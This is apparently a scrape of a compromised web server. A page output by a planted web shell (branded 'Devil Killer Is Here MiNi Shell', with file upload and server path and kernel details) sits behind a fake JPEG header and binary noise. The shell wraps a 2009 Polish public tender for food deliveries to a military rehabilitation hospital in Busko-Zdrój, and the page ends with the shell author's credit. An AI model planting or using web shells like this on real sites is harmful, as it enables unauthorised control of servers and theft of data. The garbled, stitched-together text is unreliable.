JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090213/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090213/37787-N-2009.html

<p class="kh_header"><b>Busko-Zdrój: Dostawy produktów mlecznych, pieczywa i wyrobów ciastkarskich oraz przypraw</b><br>
<b>Numer ogłoszenia: 37787 - 2009; data zamieszczenia: 13.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 21 Wojskowy Szpital Uzdrowiskowo-Rehabilitacyjny SP ZOZ , ul. Gen. F. Rzewuskiego 8, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3780919, 3780348, faks 041 3780332.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.21wszur.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy produktów mlecznych, pieczywa i wyrobów ciastkarskich oraz przypraw.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawy mleka i przetworów mlecznych; Dostawy przypraw do potraw ; Dostawa pieczywa; Dostawa wyrobów ciastkarskich.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.80.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 26.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Warunki złożenia Wadium
1. Wadium w wysokości odpowiednio na poszczególne części:
Pakiet I - 5000,00 zł.(słownie: pięć tysięcy zł.)
Pakiet II - 2000,00 zł. ( słownie : dwa tysiące zł.) 
Pakiet III - 2000,00 zł. (dwa tysiące złotych)
Pakiet IV - 2000,00 zł. (dwa tysiące złotych)
może być wniesione najpóźniej do dnia 23 lutego 2009 r. do godz. 11.00,  w pieniądzu - przelewem na rachunek bankowy - BPH O Busko Zdrój  68-10600076-0000320001263294;
lub: w kasie Zamawiającego
- w poręczeniach bankowych;
- w gwarancjach bankowych; 
- w gwarancjach ubezpieczeniowych;
2. Wadium w pieniądzu uważa się za wniesione z chwilą wpłynięcia na konto bankowe
Zamawiającego.
4.Przelew musi posiadać nazwę, w zależności od pakietu,  na który lub które, składana jest oferta, przy czym, jeżeli Wykonawca składa oferty na kilka pakietów, wadium musi być wpłacone na każdy pakiet oddzielnie z podaniem nazwy pakietu tj: Wadium do oferty na Pakiet I - Dostawy mleka i przetworów mlecznych	
Pakiet II - Dostawy przypraw do potraw			
Pakiet III - Dostawa pieczywa 				
Pakiet IV -Dostawa wyrobów ciastkarskich		.
5.Zamawiający informuje, iż nie będą przyjmowane wpłaty od Wykonawców, wadium w postaci gotówki do kasy Zamawiającego.
6.Kserokopię dowodu wpłaty(polecenie przelewu) należy dołączyć do oferty.
W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach określonych w roz. X pkt 1 oryginał należy złożyć w kasie Zamawiającego przed ustalonym terminem otwarcia ofert, kopię poświadczoną za zgodność z oryginałem należy dołączyć do oferty.
UWAGA! Wadium musi być zabezpieczone na okres 30 dni, licząc od daty składania ofert - termin związania ofertą. Oferta zabezpieczona na okres krótszy niż wymagany zostanie odrzucona.
Nie wniesienie wadium w wymaganym terminie oraz wymaganej wysokości i formie skutkuje wykluczeniem oferenta z postępowania.
Złożone poręczenie lub gwarancja muszą zawierać w swojej treści zobowiązanie zgodne z art. 46 ust. 5 ustawy, a mianowicie: - 
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
-  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
-zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
4. Zwrot wadium
Zamawiający niezwłocznie zwróci wadium, gdy:
-upłynął termin związania ofertą,
-zawarto umowę; 
-unieważnił postępowanie, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich składania,
Zamawiający zwróci niezwłocznie wadium na pisemne zgłoszenie wniosku przez Wykonawcę:
a) który wycofał ofertę przed upływem terminu składania ofert,
b) który został wykluczony z postępowania,
c) którego oferta została odrzucona.
Złożenie przez Oferenta, którego oferta została odrzucona lub wykluczonego z postępowania, wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez wykonawcę prawa do wniesienia protestu.
Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Oferenta.
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:.
-odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
1.Spełniają warunki zawarte w art. 22 ust.1 Ustawy - Prawo zamówień publicznych.
2.Nie są wykluczeni na podstawie art. 24 Ustawy - Prawo zamówień publicznych.
3.Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
4.Posiadają przystosowane środki transportu do przewozu żywności oraz przedłożą wykaz i decyzję sanepidu, iż środki transportu spełniają wymagania higieniczno-sanitarne stawiane przy transporcie żywności.
5.Oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego.
6.Posiadają dokument potwierdzający stosowanie systemu HACCP (Posiadanie 
Certyfikatu  Systemu ISO - na zgodność z jedną norm standardu ISO 9001:2000 lub i ISO 22000:2005)- dot. pakietu I,III i IV.
7.Przedstawią ofertę zgodną w wymogami ustawy Prawo zamówień publicznych i warunkami Zamawiającego określonymi w specyfikacji istotnych warunków zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu, Wykonawca winien dostarczyć następujące formularze, oświadczenia i dokumenty:
1.Formularze oferty - stanowiące załącznik nr 5, do niniejszej specyfikacji,  oddzielnie dla poszczególnych  części zamówienia wyszczególnionych w pkt III stanowiących załączniki: nr 1, 2, 3, 4. Wypełniony, podpisany przez osoby  uprawnione do reprezentowania Wykonawcy opieczętowany (pieczątką firmową i imienną ). 
2.Wykazy ilościowo - wartościowe z podaniem cen jednostkowych i wartości brutto, oddzielnie dla poszczególnych części zamówienia wyszczególnionych w pkt III stanowiących załączniki: nr 1, 2, 3,4 do niniejszej specyfikacji.
3.Oświadczenie o spełnieniu warunków przez Wykonawcę w zakresie określonym  w art.22 ust.1 -  stanowiące  załącznik  Nr 6 do niniejszej specyfikacji.
4.Oświadczenie o spełnieniu warunków przez Wykonawcę w zakresie określonym  w art. 24 Ustawy P.z.p. - stanowiące załącznik Nr 7 do niniejszej specyfikacji.
5.Oświadczenie o nie zaleganiu z płatnościami podatku do właściwego Urzędu Skarbowego i składek ZUS  - załącznik Nr 8 do niniejszej specyfikacji.  
6.Parafowany wzór Umowy (każda stron)  - załącznik nr 9.
7.Aktualny odpis z właściwego rejestru sądowego, lub  aktualne zaświadczenie 
o wpisie do ewidencji działalności gospodarczej lub poświadczone ich kserokopie 
wystawione nie wcześniej niż 6 miesięcy przed upływem składania ofert.
8. Wymagane zezwolenia i opinie uprawniające do obrotu produktami żywnościowymi  
     stanowiącymi przedmiot zamówienia.
a)Przedstawienie aktualnej decyzji właściwego terytorialnie PPIS o zatwierdzeniu 
   Zakładu do prowadzenia działalności w zakresie obrotu żywnością (art. 61 Ustawy 
z dnia 25 VIII 2006 r. o bezpieczeństwie żywności i żywienia, Dz.U. Nr 171 z 
2006 r.).
b) Protokół z ostatniego przeglądu sanitarnego wraz z arkuszem ocen.
9.Dokument potwierdzający stosowanie systemu HACCP (Posiadanie Certyfikatu  
Systemu ISO - na zgodność z jedną norm standardu ISO 9001:2001 lub i ISO 22000:2006).
10.Zamawiający wezwie wykonawców, którzy w wyznaczonym terminie nie złożyli 
dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, do 
uzupełnienia tych dokumentów w określonym terminie, jeżeli ich nie uzupełnienie 
skutkowałoby unieważnieniem postępowania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://21wszur.tbu.pl/bip/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://21wszur.tbu.pl/bip/.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2009 godzina 11:00, miejsce: 21 Wojskowy Szpital Uzdrowiskowo- Rehabilitacyjny SP ZOZ ul. Gen F. Rzewuskiego 8, 28-100 Busko-Zdrój, sekretariatu szpitala bud. Nr 2  KORAL.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy mleka i przetworów mlecznych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy mleka i przetworów mlecznych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 26.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawy przypraw do potraw.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawy przypraw do potraw.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 26.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pieczywa 
1.Dostawy towaru odbywać się będą codziennie w godzinach 6 - 6.30 z wyłączeniem świąt, do magazynu Zamawiającego, z rozładunkiem, w oparciu o szczegółowe zamówienia pod względem ilości.
2.Zamówienia zgłoszone telefonicznie z dwudniowym wyprzedzeniem, potwierdzone pod względem ilości w dniu poprzedzającym dostawę do godz. 11.00
3.Realizacja dostaw na koszt i ryzyko Dostawcy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 26.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość i walory smakowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa wyrobów ciastkarskich.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wyrobów ciastkarskich 
1.Dostawy towaru odbywać się będą codziennie w godzinach 6 - 6.30 z wyłączeniem świąt, do magazynu Zamawiającego, z rozładunkiem, w oparciu o szczegółowe zamówienia pod względem ilości.
2.Zamówienia zgłoszone telefonicznie z dwudniowym wyprzedzeniem, potwierdzone pod względem ilości w dniu poprzedzającym dostawę do godz. 11.00
3.Realizacja dostaw na koszt i ryzyko Dostawcy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 26.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość i walory smakowe - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com